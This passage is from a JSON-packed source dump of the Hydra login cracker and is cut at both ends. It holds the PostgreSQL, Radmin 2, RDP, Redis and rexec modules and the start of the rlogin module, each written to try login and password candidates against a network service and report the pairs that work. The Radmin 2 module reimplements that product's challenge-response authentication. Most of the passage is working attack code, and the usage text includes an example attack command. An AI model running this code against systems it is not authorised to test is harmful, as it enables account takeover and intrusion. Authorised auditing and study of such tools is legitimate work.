*HYDRA_EXIT;\n\nint32_t start_postgres(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char database[256];\n char connection_string[1024];\n PGconn *pgconn;\n\n if (miscptr)\n strncpy(database, miscptr, sizeof(database) - 1);\n else\n strncpy(database, DEFAULT_DB, sizeof(database) - 1);\n database[sizeof(database) - 1] = 0;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n /*\n * Building the connection string\n */\n\n snprintf(connection_string, sizeof(connection_string), \"host = '%s' port = '%d' dbname = '%s' user = '%s' password = '%s' \", hydra_address2string(ip), port, database, login, pass);\n\n if (verbose)\n hydra_report(stderr, \"connection string: %s\\n\", connection_string);\n\n pgconn = PQconnectdb(connection_string);\n if (PQstatus(pgconn) == CONNECTION_OK) {\n PQfinish(pgconn);\n hydra_report_found_host(port, ip, \"postgres\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n } else {\n PQfinish(pgconn);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n }\n return 1;\n}\n\nvoid service_postgres(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_POSTGRES, mysslport = PORT_POSTGRES_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2:\n /*\n * Here we start the password cracking process\n */\n next_run = start_postgres(sock, ip, port, options, miscptr, fp);\n if ((next_run == 2 || next_run == 1) && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_postgres_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_postgres(const char *service) {\n printf(\"Module postgres is optionally taking the database to attack, default \"\n \"is \\\"template1\\\"\\n\\n\");\n}\n" }, { "path": "hydra-radmin2.c", "content": "#include \"hydra-mod.h\"\n#include \n#include \n#ifdef HAVE_GCRYPT\n#include \n#endif\n\nextern char *HYDRA_EXIT;\n\n// RAdmin 2.x\n\nstruct rmessage {\n uint8_t magic; // Indicates version, probably?\n uint32_t length; // Total message size of data.\n uint32_t checksum; // Checksum from type to end of data.\n uint8_t type; // Command type, table below.\n unsigned char data[32]; // data to be sent.\n};\n\n/*\n * Usage: sum = checksum(message);\n * Function: Returns a 4 byte little endian sum of the messages typecode+data.\n * This data is zero padded for alignment. Example message (big endian):\n * [01][00000021][0f43d461] sum([1b6e779a f37189bb c1b22982 c80d1f4d 66678ff9\n * 4b10f0ce eabff6e8 f4fb8338 3b] + zeropad(3)]) Sum: is 0f43d461 (big endian)\n */\nuint32_t checksum(struct rmessage *msg) {\n int32_t blen;\n uint8_t *stream;\n uint32_t sum;\n blen = msg->length; // Get the real length.\n blen += (4 - (blen % 4));\n\n // Allocate a worksapce.\n stream = calloc(blen, sizeof(uint8_t));\n memcpy(stream, &msg->type, sizeof(uint8_t));\n memcpy(stream + 1, msg->data, blen - 1);\n\n sum = 0;\n for (blen -= sizeof(uint32_t); blen > 0; blen -= sizeof(uint32_t)) {\n sum += *(uint32_t *)(stream + blen);\n }\n sum += *(uint32_t *)stream;\n\n // Free the workspace.\n free(stream);\n\n return sum;\n}\n\n/*\n * Usage: challenge_request(message);\n * Function: Modifies message to reflect a request for a challenge. Updates the\n * checksum as appropriate.\n */\nvoid challenge_request(struct rmessage *msg) {\n msg->magic = 0x01;\n msg->length = 0x01;\n msg->type = 0x1b;\n msg->checksum = checksum(msg);\n}\n\n/*\n * Usage: challenge_request(message);\n * Function: Modifies message to reflect a response to a challenge. Updates the\n * checksum as appropriate.\n */\nvoid challenge_response(struct rmessage *msg, unsigned char *solution) {\n msg->magic = 0x01;\n msg->length = 0x21;\n msg->type = 0x09;\n memcpy(msg->data, solution, 0x20);\n msg->checksum = checksum(msg);\n}\n\n/*\n * Usage: buffer = message2buffer(message); send(buffer, message->length + 10);\n * free(buffer) Function: Allocates a buffer for transmission and fills the\n * buffer with message data such that it is ready to transmit.\n */\n// TODO: conver to a sendMessage() function?\nchar *message2buffer(struct rmessage *msg) {\n char *data;\n if (msg == NULL) {\n hydra_report(stderr, \"rmessage is null\\n\");\n hydra_child_exit(0);\n return NULL;\n }\n\n switch (msg->type) {\n case 0x1b: // Challenge request\n data = (char *)calloc(10, sizeof(char));\n if (data == NULL) {\n hydra_report(stderr, \"calloc failure\\n\");\n hydra_child_exit(0);\n }\n memcpy(data, &msg->magic, sizeof(char));\n *((int32_t *)(data + 1)) = htonl(msg->length);\n *((int32_t *)(data + 5)) = htonl(msg->checksum);\n memcpy((data + 9), &msg->type, sizeof(char));\n break;\n case 0x09:\n data = (char *)calloc(42, sizeof(char));\n if (data == NULL) {\n hydra_report(stderr, \"calloc failure\\n\");\n hydra_child_exit(0);\n }\n memcpy(data, &msg->magic, sizeof(char));\n *((int32_t *)(data + 1)) = htonl(msg->length);\n *((int32_t *)(data + 5)) = htonl(msg->checksum);\n memcpy((data + 9), &msg->type, sizeof(char));\n memcpy((data + 10), msg->data, sizeof(char) * 32);\n break;\n default:\n hydra_report(stderr, \"unknown rmessage type\\n\");\n hydra_child_exit(0);\n return NULL;\n }\n return data;\n}\n\nstruct rmessage *buffer2message(char *buffer) {\n struct rmessage *msg;\n msg = calloc(1, sizeof(struct rmessage));\n if (msg == NULL) {\n hydra_report(stderr, \"calloc failure\\n\");\n hydra_child_exit(0);\n }\n\n // Start parsing...\n msg->magic = buffer[0];\n buffer += sizeof(char);\n msg->length = ntohl(*((uint32_t *)(buffer)));\n buffer += sizeof(uint32_t);\n msg->checksum = ntohl(*((uint32_t *)(buffer)));\n buffer += sizeof(uint32_t);\n msg->type = buffer[0];\n buffer += sizeof(char);\n\n // Verify known fields...\n if (msg->magic != 0x01) {\n hydra_report(stderr, \"Bad magic\\n\");\n hydra_child_exit(0);\n return NULL;\n }\n\n switch (msg->type) {\n case 0x1b:\n if (msg->length != 0x21) {\n hydra_report(stderr, \"Bad length...%08x\\n\", msg->length);\n hydra_child_exit(0);\n return NULL;\n }\n memcpy(msg->data, buffer, 32);\n break;\n case 0x0a:\n // Win!\n case 0x0b:\n // Lose!\n break;\n default:\n hydra_report(stderr, \"unknown rmessage type\");\n hydra_child_exit(0);\n return NULL;\n }\n return msg;\n}\n\nint32_t start_radmin2(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) { return 0; }\n\nvoid service_radmin2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n#ifdef HAVE_GCRYPT\n int32_t sock = -1;\n int32_t index;\n int32_t bytecount;\n char *request;\n struct rmessage *msg;\n int32_t myport = PORT_RADMIN2;\n char buffer[42];\n char password[101];\n uint8_t rawkey[16];\n uint8_t *IV = \"\\xFE\\xDC\\xBA\\x98\\x76\\x54\\x32\\x10\\xA3\\x9D\\x4A\\x18\\xF8\\x5B\\x4A\\x52\";\n uint8_t encrypted[32];\n gcry_error_t err;\n gcry_cipher_hd_t cipher;\n gcry_md_hd_t md;\n\n if (port != 0) {\n myport = port;\n }\n\n gcry_check_version(NULL);\n\n memset(buffer, 0x00, sizeof(buffer));\n\n // Phone the mother ship\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return;\n }\n\n while (1) {\n /* Typical conversation goes as follows...\n 0) connect to server\n 1) request challenge\n 2) receive 32 byte challenge response\n 3) send 32 byte challenge solution\n 4) receive 1 byte auth success/fail message\n */\n // 0) Connect to the server\n sock = hydra_connect_tcp(ip, myport);\n if (sock < 0) {\n hydra_report(stderr, \"Error: Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n // 1) request challenge (working)\n msg = calloc(1, sizeof(struct rmessage));\n challenge_request(msg);\n request = message2buffer(msg);\n hydra_send(sock, request, 10, 0);\n free(msg);\n free(request);\n\n // 2) receive response (working)\n index = 0;\n while (index < 42) { // We're always expecting back a 42 byte buffer from a\n // challenge request.\n switch (hydra_data_ready(sock)) {\n case -1:\n hydra_report(stderr, \"Error: Child with pid %d terminating, receive error\\nerror:\\t%s\\n\", (int32_t)getpid(), strerror(errno));\n hydra_child_exit(1);\n break;\n case 0:\n // keep waiting...\n break;\n default:\n bytecount = hydra_recv(sock, buffer + index, 42 - index);\n if (bytecount < 0) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, receive \"\n \"error\\nerror:\\t%s\\n\",\n (int32_t)getpid(), strerror(errno));\n hydra_child_exit(1);\n }\n index += bytecount;\n }\n }\n\n // 3) Send challenge solution.\n\n // Get a password to work with.\n memset(password, 0x00, sizeof(password));\n memset(encrypted, 0x00, sizeof(encrypted));\n hydra_get_next_pair();\n strncpy(password, hydra_get_next_password(), sizeof(password) - 1);\n\n // MD5 the password to generate the password key, this is used with twofish\n // below.\n err = gcry_md_open(&md, GCRY_MD_MD5, 0);\n if (err) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, gcry_md_open error \"\n \"(%08x)\\n%s/%s\",\n (int32_t)getpid(), index, gcry_strsource(err), gcry_strerror(err));\n hydra_child_exit(1);\n }\n gcry_md_reset(md);\n gcry_md_write(md, password, 100);\n if (gcry_md_read(md, 0) == NULL) {\n hydra_report(stderr, \"Error: Child with pid %d terminating, gcry_md_read error (%08x)\\n\", (int32_t)getpid(), index);\n hydra_child_exit(1);\n }\n memcpy(rawkey, gcry_md_read(md, 0), 16);\n gcry_md_close(md);\n\n // 3.a) generate a new message from the buffer\n msg = buffer2message(buffer);\n\n // 3.b) encrypt data received using pkey & known IV\n err = gcry_cipher_open(&cipher, GCRY_CIPHER_TWOFISH128, GCRY_CIPHER_MODE_CBC, 0);\n if (err) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, gcry_cipher_open \"\n \"error (%08x)\\n%s/%s\",\n (int32_t)getpid(), index, gcry_strsource(err), gcry_strerror(err));\n hydra_child_exit(1);\n }\n\n err = gcry_cipher_setiv(cipher, IV, 16);\n if (err) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, gcry_cipher_setiv \"\n \"error (%08x)\\n%s/%s\",\n (int32_t)getpid(), index, gcry_strsource(err), gcry_strerror(err));\n hydra_child_exit(1);\n }\n\n err = gcry_cipher_setkey(cipher, rawkey, 16);\n if (err) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, gcry_cipher_setkey \"\n \"error (%08x)\\n%s/%s\",\n (int32_t)getpid(), index, gcry_strsource(err), gcry_strerror(err));\n hydra_child_exit(1);\n }\n\n err = gcry_cipher_encrypt(cipher, encrypted, 32, msg->data, 32);\n if (err) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, gcry_cipher_encrypt \"\n \"error (%08x)\\n%s/%s\",\n (int32_t)getpid(), index, gcry_strsource(err), gcry_strerror(err));\n hydra_child_exit(1);\n }\n\n gcry_cipher_close(cipher);\n\n // 3.c) half sum - this is the solution to the challenge.\n for (index = 0; index < 16; index++) {\n *(encrypted + index) += *(encrypted + index + 16);\n }\n memset((encrypted + 16), 0x00, 16);\n\n // 3.d) send half sum\n challenge_response(msg, encrypted);\n request = message2buffer(msg);\n hydra_send(sock, request, 42, 0);\n free(msg);\n free(request);\n\n // 4) receive auth success/failure\n index = 0;\n while (index < 10) { // We're always expecting back a 42 byte buffer from a\n // challenge request.\n switch (hydra_data_ready(sock)) {\n case -1:\n hydra_report(stderr, \"Error: Child with pid %d terminating, receive error\\nerror:\\t%s\\n\", (int32_t)getpid(), strerror(errno));\n hydra_child_exit(1);\n break;\n case 0:\n // keep waiting...\n break;\n default:\n bytecount = hydra_recv(sock, buffer + index, 10 - index);\n if (bytecount < 0) {\n hydra_report(stderr,\n \"Error: Child with pid %d terminating, receive \"\n \"error\\nerror:\\t%s\\n\",\n (int32_t)getpid(), strerror(errno));\n hydra_child_exit(1);\n }\n index += bytecount;\n }\n }\n msg = buffer2message(buffer);\n switch (msg->type) {\n case 0x0a:\n hydra_completed_pair_found();\n break;\n case 0x0b:\n hydra_completed_pair();\n hydra_disconnect(sock);\n break;\n default:\n hydra_report(stderr, \"Error: Child with pid %d terminating, protocol error\\n\", (int32_t)getpid());\n hydra_child_exit(2);\n }\n free(msg);\n }\n#endif\n}\n\nint32_t service_radmin2_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-rdp.c", "content": "/*\n This module is using freerdp3 lib\n\n Tested on:\n - Windows 7 pro SP1\n - Windows 10 pro build 1809\n - Windows Server 2016 build 1607\n*/\n\n#include \"hydra-mod.h\"\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n#ifndef LIBFREERDP\nvoid dummy_rdp() { printf(\"\\n\"); }\n#else\n\n#include \n#include \nfreerdp *instance = 0;\nBOOL rdp_connect(char *server, int32_t port, char *domain, char *login, char *password) {\n int32_t err = 0;\n\n rdpSettings *settings = instance->context->settings;\n\n settings->Username = login;\n settings->Password = password;\n settings->IgnoreCertificate = TRUE;\n if (password[0] == 0)\n settings->AuthenticationOnly = FALSE;\n else\n settings->AuthenticationOnly = TRUE;\n settings->ServerHostname = server;\n settings->ServerPort = port;\n settings->Domain = domain;\n\n#if FREERDP_VERSION_MAJOR == 2\n settings->MaxTimeInCheckLoop = 100;\n#endif\n // freerdp timeout format is microseconds -> default:15000\n settings->TcpConnectTimeout = hydra_options.waittime * 1000;\n settings->TlsSecLevel = 0;\n freerdp_connect(instance);\n err = freerdp_get_last_error(instance->context);\n return err;\n}\n\n/* Client program */\nint32_t start_rdp(char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char server[64];\n char domain[256];\n int32_t login_result = 0;\n\n memset(domain, 0, sizeof(domain));\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n strncpy(server, hydra_address2string(ip), sizeof(server) - 1);\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n strncpy(domain, miscptr, sizeof(domain) - 1);\n domain[sizeof(domain) - 1] = 0;\n }\n\n login_result = rdp_connect(server, port, domain, login, pass);\n if (debug)\n hydra_report(stderr, \"[DEBUG] rdp reported %08x\\n\", login_result);\n switch (login_result) {\n case 0:\n // login success\n hydra_report_found_host(port, ip, \"rdp\", fp);\n hydra_completed_pair_found();\n break;\n case 0x00020009:\n case 0x00020014:\n case 0x00020015:\n // login failure\n hydra_completed_pair();\n break;\n case 0x0002000f:\n // login failure\n hydra_completed_pair_skip();\n break;\n case 0x0002000d:\n hydra_report(stderr,\n \"[%d][rdp] account on %s might be valid but account not \"\n \"active for remote desktop: login: %s password: %s, \"\n \"continuing attacking the account.\\n\",\n port, hydra_address2string_beautiful(ip), login, pass);\n hydra_completed_pair();\n break;\n case 0x00020006:\n case 0x00020008:\n case 0x0002000c:\n // cannot establish rdp connection, either the port is not opened or it's\n // not rdp\n return 3;\n default:\n if (verbose) {\n hydra_report(stderr, \"[ERROR] freerdp: %s (0x%.8x)\\n\", freerdp_get_last_error_string(login_result), login_result);\n }\n return login_result;\n }\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n}\n\nvoid service_rdp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1;\n int32_t myport = PORT_RDP;\n int32_t __first_rdp_connect = 1;\n\n if (port != 0)\n myport = port;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* run the cracking function */\n if (__first_rdp_connect != 0)\n __first_rdp_connect = 0;\n else\n sleep(hydra_options.conwait);\n next_run = start_rdp(ip, myport, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2: /* clean exit */\n freerdp_disconnect(instance);\n freerdp_free(instance);\n hydra_child_exit(0);\n return;\n case 3: /* connection error case */\n hydra_report(stderr, \"[ERROR] freerdp: %s\\n\", \"The connection failed to establish.\");\n freerdp_free(instance);\n hydra_child_exit(1);\n return;\n default:\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_rdp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n // Disable freerdp output\n wLog *root = WLog_GetRoot();\n WLog_SetStringLogLevel(root, \"OFF\");\n\n // Init freerdp instance\n instance = freerdp_new();\n if (instance == NULL || freerdp_context_new(instance) == FALSE) {\n hydra_report(stderr, \"[ERROR] freerdp init failed\\n\");\n return -1;\n }\n return 0;\n}\n\nvoid usage_rdp(const char *service) {\n printf(\"Module rdp is optionally taking the windows domain name.\\n\"\n \"For example:\\nhydra rdp://192.168.0.1/firstdomainname -l john -p \"\n \"doe\\n\\n\");\n}\n#endif\n" }, { "path": "hydra-redis.c", "content": "#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_redis(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *pass, buffer[510];\n char *empty = \"\";\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n char pass_num[50];\n int32_t pass_len = strlen(pass);\n snprintf(pass_num, 50, \"%d\", pass_len);\n\n memset(buffer, 0, sizeof(buffer));\n sprintf(buffer, \"*2\\r\\n$4\\r\\nAUTH\\r\\n$%.50s\\r\\n%.250s\\r\\n\", pass_num, pass);\n\n if (debug)\n hydra_report(stderr, \"[DEBUG] Auth:\\n %s\\n\", buffer);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL) {\n hydra_report(stderr, \"[ERROR] Failed to receive response from Redis server.\\n\");\n return 3;\n }\n\n if (buf[0] == '+') {\n hydra_report_found_host(port, ip, \"redis\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 4;\n return 1;\n }\n\n if (buf[0] == '-') {\n if (verbose > 1)\n hydra_report(stderr, \"[VERBOSE] Authentication failed for password %s\\n\", pass);\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 4;\n return 2;\n } else {\n hydra_report(stderr, \"[ERROR] Redis service shutdown.\\n\");\n free(buf);\n return 3;\n }\n\n /* not reached */\n return 1;\n}\n\nvoid service_redis_core(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname, int32_t tls) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_REDIS, mysslport = PORT_REDIS_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n hydra_child_exit(0);\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n usleepn(250);\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_redis(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* error exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n break;\n case 4: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nvoid service_redis(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_redis_core(ip, sp, options, miscptr, fp, port, hostname, 0); }\n\n/*\n * Initial password authentication test and response test for the redis server,\n * added by Petar Kaleychev \n * The service_redis_init function is generating ping request as redis-cli\n * (command line interface). You can use redis-cli to connect with Redis. After\n * start of the redis-server in another terminal the following: % ./redis-cli\n * redis> ping\n * when the server does not require password, leads to:\n * PONG\n * when the server requires password, leads to:\n * (error) NOAUTH Authentication required.\n * or\n * (error) ERR operation not permitted (for older redis versions)\n * That is used for initial password authentication and redis server response\n * tests in service_redis_init\n */\nint32_t service_redis_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n // return codes:\n // 0 - when the server is redis and it requires password\n // n - when the server is not redis or when the server does not require\n // password\n\n int32_t sock = -1;\n int32_t myport = PORT_REDIS, mysslport = PORT_REDIS_SSL;\n char buffer[] = \"*1\\r\\n$4\\r\\nping\\r\\n\";\n\n hydra_register_socket(sp);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (verbose)\n printf(\"[VERBOSE] Initial redis password authentication test and response \"\n \"test ...\\n\");\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Can not connect to port %d on the target\\n\", myport);\n return 3;\n }\n // generating ping request as redis-cli\n if (debug)\n printf(\"[DEBUG] buffer = %s\\n\", buffer);\n // [debug mode]: buffer is:\n // *1\n // $4\n // ping\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n return 2;\n }\n buf = hydra_receive_line(sock);\n if (debug)\n printf(\"[DEBUG] buf = %s\\n\", buf);\n // authentication test\n if (strstr(buf, \"+PONG\") != NULL) { // the server does not require password\n hydra_report(stderr, \"[!] The server %s does not require password.\\n\", hostname);\n free(buf);\n return 2;\n }\n // server response test\n if (strstr(buf, \"-NOAUTH Authentication required\") == NULL && strstr(buf, \"-ERR operation not permitted\") == NULL) {\n hydra_report(stderr, \"[ERROR] The server is not redis, exit.\\n\");\n free(buf);\n return 2;\n }\n if (verbose)\n printf(\"[VERBOSE] The redis server requires password.\\n\");\n free(buf);\n sock = hydra_disconnect(sock);\n return 0;\n}\n" }, { "path": "hydra-rexec.c", "content": "#include \"hydra-mod.h\"\n\n// no memleaks found on 110425\n\n#define COMMAND \"/bin/ls /\"\n\nextern char *HYDRA_EXIT;\n\nint32_t start_rexec(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[300] = \"\", buffer2[100], *bptr = buffer2;\n int32_t ret;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memset(buffer2, 0, sizeof(buffer2));\n bptr++;\n\n strcpy(bptr, login);\n bptr += 1 + strlen(login);\n\n strcpy(bptr, pass);\n bptr += 1 + strlen(pass);\n\n strcpy(bptr, COMMAND);\n\n if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(pass) + strlen(COMMAND), 0) < 0) {\n return 1;\n }\n\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n\n if (ret > 0 && buffer[0] == 0) {\n hydra_report_found_host(port, ip, \"rexec\", fp);\n hydra_completed_pair_found();\n } else\n hydra_completed_pair();\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_rexec(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_REXEC, mysslport = PORT_REXEC_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_rexec(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_rexec_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-rlogin.c", "content": "#include \"hydra-mod.h\"\n\n/*\n\nRFC 1258\nclient have to use port from 512 -> 1023 or server is denying the connection\n\nno memleaks found on 110425\n*/\n\n#define TERM \"vt100/9600\"\n\nextern char *HYDRA_EXIT;\n\nint32_t start_rlogin(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[300] = \"\", buffer2[100], *bptr = buffer2;\n int32_t ret;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memset(buffer2, 0, sizeof(buffer2));\n bptr++;\n\n strcpy(bptr, login);\n bptr += 1 + strlen(login);\n\n strcpy(bptr, login);\n bptr += 1 + strlen(login);\n\n strcpy(bptr, TERM);\n\n if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(TERM), 0) < 0) {\n return 4;\n }\n buffer[0] = 0;\n if ((ret = hydra_recv(s, buffer, sizeof(buffer) - 1)) >= 0)\n buffer[ret] = 0;\n /* 0x00 is sent but hydra_recv transformed it */\n if (strlen(buffer) == 0) {\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n }\n if (ret >= 0)\n buffer[ret] = 0;\n\n if (ret > 0 && (strstr(buffer, \"rlogind:\") != NULL))\n return 1;\n\n if (ret > 0 && (strstr(buffer, \"ssword\") != NULL)) {\n if (strlen((pass = hydra_get_next_password())) == 0)\n pass = empty;\n sprintf(buffer2, \"%s\\r\", pass);\n if (hydra_send(s, buffer2, 1 + strlen(pass), 0) < 0) {\n return 1;\n }\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv(s, buffer, sizeof(buffer));\n if (strcmp(buffer, \"\\r\\n\"))\n if ((ret = hydra_recv(s, buffer, sizeof(buffer) - 1)) > 0)\n buffer[ret] = 0;\n }\n /* Authentication failure */\n\n if (ret > 0 && (strstr(buffer, \"ssword\") == NULL)) {\n#ifdef HAVE_PCRE\n if (!hydra_string_match(buffer, \"\\\\s(failure|incorrect|denied)\")) {\n#else\n /* check for failure and incorrect msg */\n if 